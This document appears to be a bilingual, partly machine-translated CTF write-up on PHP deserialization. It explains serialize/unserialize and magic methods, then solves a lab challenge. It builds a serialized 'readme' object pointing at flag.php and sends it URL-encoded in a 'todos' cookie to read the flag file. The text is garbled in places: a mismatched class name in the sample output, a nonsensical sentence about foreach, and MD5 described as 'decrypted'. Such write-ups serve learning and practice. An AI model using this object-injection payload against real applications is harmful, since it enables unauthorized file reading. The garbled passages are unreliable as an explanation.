Unserialize deserialize
What is serialization?
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。
【将状态信息保存为字符串】
Simple understanding: Convert objects, classes, arrays, variables, anonymous functions, etc. in PHP into strings for easy storage in a database or file
What is deserialization?
序列化就是将对象的状态信息转为字符串储存起来,那么反序列化就是再将这个状态信息拿出来使用。(重新再转化为对象或者其他的)
【将字符串转化为状态信息】
Let’s first recognize a function
__FILE__
The file path is returned
show_source(__FILE__)
This is to return the source code of the current file, which may be used a lot in CTF competitions
serialize()
Converting an object to a string
After creating an object in php, you can use serialize() to convert the object into a string, and save the value of the object for later transfer and use.
<?php
show_source(__FILE__);
class chybeta{
var $test = '123';
}
$class1 = new chybeta;
$class1_ser = serialize($class1);
echo "<hr>";
print_r($class1_ser);
?>
O: 7: “missing”: 1: {s: 4: “test”; s: 3: “123”;}
这串字符的含义:变量类型;
类名长度;类名;属性变量
{
属性类型;属性名长度;属性名;属性值类型;属性值长度;属性值内容}
o 表示object对象
7 表示对象名称有7个字符
chybeta 对象名称
1 表示只有一个值
s 表示 string 字符串
4 表示test 字符串长度
This function
unserialize()
It is the opposite of serialize(), which converts a string into an object
print_r
Output non-string
Magic method
There is a special method in php called "Magic function" (magic function), here we focus on a few:
__construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。(构造函数)
__destruct():当对象被销毁时会自动调用。(析构函数)
__wakeup() :如前所提,unserialize()时会自动调用。
还有一个__tostring(),只要调用了echo 来打印对象体,就回自动调用__tostring()
We started directly into the shooting range
We found that as long as he input source, he will enter the first if branch
and output echo $s, and then call the __tostring() method to display the content of Readme.txt
We look down and find that in addition to the next if branch, there is an unserialize() function.
However, there is no echo;
we continue to look down and find
There is a
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
<?php endforeach;?>
and*
- <? = $ all?>
- *In fact, it is equivalent to echo. Our second if branch calls todos. It just so happens that it uses ∗ ∗ foreach () ∗ ∗ to also invoke todos, and it just so happens that it also uses **foreach()** Upt o d o s ,Just just good it was it with∗∗foreach()∗* Also tune with a todos
We may not know what this foreach() is for, we directly Baidu, know that it is an easy way to traverse the array
After reading all the code, can we control the $todos in the second if branch condition to control the deserialization and let it read the file we want it to read?
We first make the serialized code, modify the code, and get the serialized string
<?php Class readme{ public function __toString() { return highlight_file('Readme.txt', true).highlight_file($this->source, true); } } if(isset($_GET['source'])){ $s = new readme(); $s->source = 'flag.php'; $s = [$s]; echo serialize($s); } ?>
a:1:{i:0;O:6:“readme”:1:{s:6:“source”;s:8:“flag.php”;}}
e2d4f7dcc43ee1db7f69e76303d0105c
Because its source code was decrypted once for md5, plus a substr(0,15), we can set the value of
$c in the cookie parameter. $c = e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0;O :6:"readme":1:{s:6:"source";s:8:"flag.php";}}Because the cookie transfer is a URL encoding, we encode it, and then transfer
todos=e2d4f7dcc43ee1db7f69e76303d0105ca%3a1%3a%7bi%3a0%3bO%3a6%3a%22readme%22%3a1%3a%7bs%3a6%3a% 22source%22%3bs%3a8%3a%22flag.php%22%3b%7d%7d